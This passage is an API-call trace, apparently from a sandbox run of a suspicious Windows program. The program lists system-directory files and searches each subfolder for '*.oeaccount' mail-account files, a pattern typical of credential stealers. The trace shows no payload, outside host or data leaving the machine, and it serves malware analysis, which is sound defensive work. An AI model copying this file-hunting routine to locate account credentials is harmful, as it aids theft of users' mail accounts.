returned 1 [0252.576] strlen (_Str="") returned 0x0 [0252.576] strlen (_Str="ActivationClient.dll") returned 0x14 [0252.576] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.576] strlen (_Str="") returned 0x0 [0252.576] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.576] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.576] strlen (_Str="") returned 0x0 [0252.576] strlen (_Str="activeds.dll") returned 0xc [0252.577] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.577] strlen (_Str="") returned 0x0 [0252.577] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.577] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.577] strlen (_Str="") returned 0x0 [0252.577] strlen (_Str="activeds.tlb") returned 0xc [0252.577] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.577] strlen (_Str="") returned 0x0 [0252.577] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.577] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.577] strlen (_Str="") returned 0x0 [0252.577] strlen (_Str="actxprxy.dll") returned 0xc [0252.577] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.577] strlen (_Str="") returned 0x0 [0252.577] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.577] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.577] strlen (_Str="") returned 0x0 [0252.577] strlen (_Str="AddressParser.dll") returned 0x11 [0252.577] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.577] strlen (_Str="") returned 0x0 [0252.577] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.577] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.577] strlen (_Str="") returned 0x0 [0252.577] strlen (_Str="AdmTmpl.dll") returned 0xb [0252.577] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.577] strlen (_Str="") returned 0x0 [0252.577] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.577] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.577] strlen (_Str="") returned 0x0 [0252.577] strlen (_Str="adprovider.dll") returned 0xe [0252.577] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.577] strlen (_Str="") returned 0x0 [0252.577] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.577] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.577] strlen (_Str="") returned 0x0 [0252.577] strlen (_Str="adrclient.dll") returned 0xd [0252.577] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.577] strlen (_Str="") returned 0x0 [0252.577] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.577] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.577] strlen (_Str="") returned 0x0 [0252.577] strlen (_Str="adsldp.dll") returned 0xa [0252.577] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.578] strlen (_Str="") returned 0x0 [0252.578] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.578] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.578] strlen (_Str="") returned 0x0 [0252.578] strlen (_Str="adsldpc.dll") returned 0xb [0252.578] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.578] strlen (_Str="") returned 0x0 [0252.578] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.578] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.578] strlen (_Str="") returned 0x0 [0252.578] strlen (_Str="adsmsext.dll") returned 0xc [0252.578] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.578] strlen (_Str="") returned 0x0 [0252.578] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.578] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.578] strlen (_Str="") returned 0x0 [0252.578] strlen (_Str="adsnt.dll") returned 0x9 [0252.578] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.578] strlen (_Str="") returned 0x0 [0252.578] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.578] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.578] strlen (_Str="") returned 0x0 [0252.578] strlen (_Str="adtschema.dll") returned 0xd [0252.578] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.578] strlen (_Str="") returned 0x0 [0252.578] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.578] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.578] strlen (_Str="") returned 0x0 [0252.578] strlen (_Str="AdvancedInstallers") returned 0x12 [0252.578] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.578] strlen (_Str="") returned 0x0 [0252.578] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.578] strcmp (_Str1="AdvancedInstallers", _Str2="..") returned 1 [0252.578] strcmp (_Str1="AdvancedInstallers", _Str2=".") returned 1 [0252.578] strlen (_Str="AdvancedInstallers") returned 0x12 [0252.578] strlen (_Str="AdvancedInstallers") returned 0x12 [0252.578] strlen (_Str="*.oeaccount") returned 0xb [0252.578] _mbscpy (in: param_1=0x19e324, param_2=0x19e6ec | out: param_1=0x19e324) returned 0x19e324 [0252.578] strlen (_Str="AdvancedInstallers") returned 0x12 [0252.578] _mbscat (in: param_1=0x19e324, param_2=0x414078 | out: param_1=0x19e324) returned 0x19e324 [0252.578] _mbscat (in: param_1=0x19e324, param_2=0x4154e8 | out: param_1=0x19e324) returned 0x19e324 [0252.578] FindFirstFileA (in: lpFileName="AdvancedInstallers\\*.oeaccount", lpFindFileData=0x19e468 | out: lpFindFileData=0x19e468) returned 0xffffffff [0252.580] strlen (_Str="AdvancedInstallers") returned 0x12 [0252.580] strlen (_Str="AdvancedInstallers") returned 0x12 [0252.580] strlen (_Str="*.*") returned 0x3 [0252.580] _mbscpy (in: param_1=0x19e834, param_2=0x19ebfc | out: param_1=0x19e834) returned 0x19e834 [0252.580] strlen (_Str="AdvancedInstallers") returned 0x12 [0252.580] _mbscat (in: param_1=0x19e834, param_2=0x414078 | out: param_1=0x19e834) returned 0x19e834 [0252.580] _mbscat (in: param_1=0x19e834, param_2=0x4147c4 | out: param_1=0x19e834) returned 0x19e834 [0252.580] FindFirstFileA (in: lpFileName="AdvancedInstallers\\*.*", lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0x24ea20 [0252.580] strlen (_Str="AdvancedInstallers") returned 0x12 [0252.580] strlen (_Str=".") returned 0x1 [0252.580] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.580] strlen (_Str="AdvancedInstallers") returned 0x12 [0252.580] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.580] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.580] strcmp (_Str1=".", _Str2="..") returned -1 [0252.580] strcmp (_Str1=".", _Str2=".") returned 0 [0252.580] FindNextFileA (in: hFindFile=0x24ea20, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0252.580] strlen (_Str="AdvancedInstallers") returned 0x12 [0252.580] strlen (_Str="..") returned 0x2 [0252.580] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.580] strlen (_Str="AdvancedInstallers") returned 0x12 [0252.581] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.581] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.581] strcmp (_Str1="..", _Str2="..") returned 0 [0252.581] FindNextFileA (in: hFindFile=0x24ea20, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0252.581] strlen (_Str="AdvancedInstallers") returned 0x12 [0252.581] strlen (_Str="cmiv2.dll") returned 0x9 [0252.581] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.581] strlen (_Str="AdvancedInstallers") returned 0x12 [0252.581] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.581] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.581] FindNextFileA (in: hFindFile=0x24ea20, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0 [0252.581] FindClose (in: hFindFile=0x24ea20 | out: hFindFile=0x24ea20) returned 1 [0252.581] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.581] strlen (_Str="") returned 0x0 [0252.581] strlen (_Str="advapi32.dll") returned 0xc [0252.581] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.581] strlen (_Str="") returned 0x0 [0252.581] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.581] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.581] strlen (_Str="") returned 0x0 [0252.581] strlen (_Str="advapi32res.dll") returned 0xf [0252.581] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.581] strlen (_Str="") returned 0x0 [0252.581] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.581] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.581] strlen (_Str="") returned 0x0 [0252.581] strlen (_Str="advpack.dll") returned 0xb [0252.581] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.581] strlen (_Str="") returned 0x0 [0252.581] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.581] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.581] strlen (_Str="") returned 0x0 [0252.581] strlen (_Str="aeevts.dll") returned 0xa [0252.581] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.581] strlen (_Str="") returned 0x0 [0252.581] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.581] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.582] strlen (_Str="") returned 0x0 [0252.582] strlen (_Str="amcompat.tlb") returned 0xc [0252.582] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.582] strlen (_Str="") returned 0x0 [0252.582] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.582] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.582] strlen (_Str="") returned 0x0 [0252.582] strlen (_Str="amsi.dll") returned 0x8 [0252.582] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.582] strlen (_Str="") returned 0x0 [0252.582] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.582] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.582] strlen (_Str="") returned 0x0 [0252.582] strlen (_Str="amstream.dll") returned 0xc [0252.582] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.582] strlen (_Str="") returned 0x0 [0252.582] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.582] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.582] strlen (_Str="") returned 0x0 [0252.582] strlen (_Str="apds.dll") returned 0x8 [0252.582] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.582] strlen (_Str="") returned 0x0 [0252.582] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.582] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.582] strlen (_Str="") returned 0x0 [0252.582] strlen (_Str="AppCapture.dll") returned 0xe [0252.582] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.582] strlen (_Str="") returned 0x0 [0252.582] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.582] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.582] strlen (_Str="") returned 0x0 [0252.582] strlen (_Str="AppContracts.dll") returned 0x10 [0252.582] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.582] strlen (_Str="") returned 0x0 [0252.582] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.582] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.582] strlen (_Str="") returned 0x0 [0252.582] strlen (_Str="apphelp.dll") returned 0xb [0252.582] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.582] strlen (_Str="") returned 0x0 [0252.582] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.582] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.583] strlen (_Str="") returned 0x0 [0252.583] strlen (_Str="Apphlpdm.dll") returned 0xc [0252.583] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.583] strlen (_Str="") returned 0x0 [0252.583] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.583] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.583] strlen (_Str="") returned 0x0 [0252.583] strlen (_Str="appidapi.dll") returned 0xc [0252.583] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.583] strlen (_Str="") returned 0x0 [0252.583] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.583] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.583] strlen (_Str="") returned 0x0 [0252.583] strlen (_Str="AppIdPolicyEngineApi.dll") returned 0x18 [0252.583] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.583] strlen (_Str="") returned 0x0 [0252.583] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.583] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.583] strlen (_Str="") returned 0x0 [0252.583] strlen (_Str="AppLocker") returned 0x9 [0252.583] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.583] strlen (_Str="") returned 0x0 [0252.583] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.583] strcmp (_Str1="AppLocker", _Str2="..") returned 1 [0252.583] strcmp (_Str1="AppLocker", _Str2=".") returned 1 [0252.583] strlen (_Str="AppLocker") returned 0x9 [0252.583] strlen (_Str="AppLocker") returned 0x9 [0252.583] strlen (_Str="*.oeaccount") returned 0xb [0252.583] _mbscpy (in: param_1=0x19e324, param_2=0x19e6ec | out: param_1=0x19e324) returned 0x19e324 [0252.583] strlen (_Str="AppLocker") returned 0x9 [0252.583] _mbscat (in: param_1=0x19e324, param_2=0x414078 | out: param_1=0x19e324) returned 0x19e324 [0252.583] _mbscat (in: param_1=0x19e324, param_2=0x4154e8 | out: param_1=0x19e324) returned 0x19e324 [0252.583] FindFirstFileA (in: lpFileName="AppLocker\\*.oeaccount", lpFindFileData=0x19e468 | out: lpFindFileData=0x19e468) returned 0xffffffff [0252.584] strlen (_Str="AppLocker") returned 0x9 [0252.584] strlen (_Str="AppLocker") returned 0x9 [0252.584] strlen (_Str="*.*") returned 0x3 [0252.584] _mbscpy (in: param_1=0x19e834, param_2=0x19ebfc | out: param_1=0x19e834) returned 0x19e834 [0252.584] strlen (_Str="AppLocker") returned 0x9 [0252.584] _mbscat (in: param_1=0x19e834, param_2=0x414078 | out: param_1=0x19e834) returned 0x19e834 [0252.584] _mbscat (in: param_1=0x19e834, param_2=0x4147c4 | out: param_1=0x19e834) returned 0x19e834 [0252.584] FindFirstFileA (in: lpFileName="AppLocker\\*.*", lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0x24e920 [0252.584] strlen (_Str="AppLocker") returned 0x9 [0252.584] strlen (_Str=".") returned 0x1 [0252.584] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.584] strlen (_Str="AppLocker") returned 0x9 [0252.584] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.584] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.584] strcmp (_Str1=".", _Str2="..") returned -1 [0252.584] strcmp (_Str1=".", _Str2=".") returned 0 [0252.584] FindNextFileA (in: hFindFile=0x24e920, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0252.584] strlen (_Str="AppLocker") returned 0x9 [0252.584] strlen (_Str="..") returned 0x2 [0252.584] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.584] strlen (_Str="AppLocker") returned 0x9 [0252.584] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.584] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.584] strcmp (_Str1="..", _Str2="..") returned 0 [0252.584] FindNextFileA (in: hFindFile=0x24e920, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0 [0252.584] FindClose (in: hFindFile=0x24e920 | out: hFindFile=0x24e920) returned 1 [0252.584] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.584] strlen (_Str="") returned 0x0 [0252.585] strlen (_Str="AppLockerCSP.dll") returned 0x10 [0252.585] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.585] strlen (_Str="") returned 0x0 [0252.585] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.585] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.585] strlen (_Str="") returned 0x0 [0252.585] strlen (_Str="appmgmts.dll") returned 0xc [0252.585] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.585] strlen (_Str="") returned 0x0 [0252.585] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.585] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.585] strlen (_Str="") returned 0x0 [0252.585] strlen (_Str="appmgr.dll") returned 0xa [0252.585] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.585] strlen (_Str="") returned 0x0 [0252.585] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.585] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.585] strlen (_Str="") returned 0x0 [0252.585] strlen (_Str="AppointmentActivation.dll") returned 0x19 [0252.585] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.585] strlen (_Str="") returned 0x0 [0252.585] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.585] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.585] strlen (_Str="") returned 0x0 [0252.585] strlen (_Str="AppointmentApis.dll") returned 0x13 [0252.585] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.585] strlen (_Str="") returned 0x0 [0252.585] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.585] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.585] strlen (_Str="") returned 0x0 [0252.585] strlen (_Str="apprepapi.dll") returned 0xd [0252.585] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.585] strlen (_Str="") returned 0x0 [0252.585] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.585] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.585] strlen (_Str="") returned 0x0 [0252.585] strlen (_Str="apprepsync.dll") returned 0xe [0252.585] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.585] strlen (_Str="") returned 0x0 [0252.585] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.585] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.585] strlen (_Str="") returned 0x0 [0252.585] strlen (_Str="appwiz.cpl") returned 0xa [0252.586] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.586] strlen (_Str="") returned 0x0 [0252.586] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.586] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.586] strlen (_Str="") returned 0x0 [0252.586] strlen (_Str="AppxAllUserStore.dll") returned 0x14 [0252.586] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.586] strlen (_Str="") returned 0x0 [0252.586] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.586] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.586] strlen (_Str="") returned 0x0 [0252.586] strlen (_Str="AppxApplicabilityEngine.dll") returned 0x1b [0252.586] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.586] strlen (_Str="") returned 0x0 [0252.586] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.586] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.586] strlen (_Str="") returned 0x0 [0252.586] strlen (_Str="AppXDeploymentClient.dll") returned 0x18 [0252.586] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.586] strlen (_Str="") returned 0x0 [0252.586] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.586] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.586] strlen (_Str="") returned 0x0 [0252.586] strlen (_Str="AppxPackaging.dll") returned 0x11 [0252.586] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.586] strlen (_Str="") returned 0x0 [0252.586] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.586] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.586] strlen (_Str="") returned 0x0 [0252.586] strlen (_Str="AppxProvisioning.xml") returned 0x14 [0252.586] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.586] strlen (_Str="") returned 0x0 [0252.586] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.586] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.586] strlen (_Str="") returned 0x0 [0252.586] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.586] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.586] 